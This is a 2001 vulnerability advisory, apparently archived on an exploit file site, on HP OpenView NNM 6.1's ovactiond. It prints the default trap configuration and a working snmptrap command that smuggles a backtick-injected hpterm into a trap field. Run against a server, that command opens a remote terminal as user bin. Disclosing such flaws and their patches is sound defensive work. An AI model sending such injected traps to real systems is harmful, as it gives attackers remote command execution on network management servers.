exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

openview.snmp.txt

openview.snmp.txt
Posted Jun 8, 2001
Authored by Milo Van Der Zee

HP Openview NNM6.1 and earlier running on unix contains a remote vulnerability in the suid bin executable overactiond. Any program can be started remotely by sending a SNMP trap to the server. Exploit details included.

tags | exploit, remote
systems | unix
SHA-256 | 8bae1494554d275412868e489713e831885ff1d72e8a63633bb2f8680fe0525a

openview.snmp.txt

Change Mirror Download
HP Openview NNM6.1 and earlier running on unix 
have a problem with the suid bin executable
ovactiond. It allows for starting of any program by just
sending a trap or event to the station running the
daemon.

Details:
in the trapd.conf the following is defined by default
(NNM6.1):
#
EVENT
OV_MgX_NNM_Generic .1.3.6.1.4.1.11.2.17.1.0.6000
0208 "Configuration Alarms" Warning
FORMAT Generic NNM to MgX message. $12
EXEC echo snmpnotify -v 1 -e 1.3.6.1.4.1.11.2.17.1
$10 1.3.[snip...]
#

by sending this trap:
snmptrap -v 1 <NNM host> .1.3.6.1.4.1.11.2.17.1
1.2.3.4 6 60000208 0 1 s "" 2 s "" 3
s "\`/usr/bin/X11/hpterm -display <your client
display>\`" 4 s "" [snip...] 12 s ""

You get an hpterm on your client display running
under user bin on the NNM server.

The reason is that NNM first completes the command
under the EXEC and then starts that in a shell.

Path:
the patch to install is PHSS_23779 and is default in
all newest patch releases of NNM. This patch checks
for 'strange' characters in the input strings received
through the event or trap.

MAG,
Milo
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close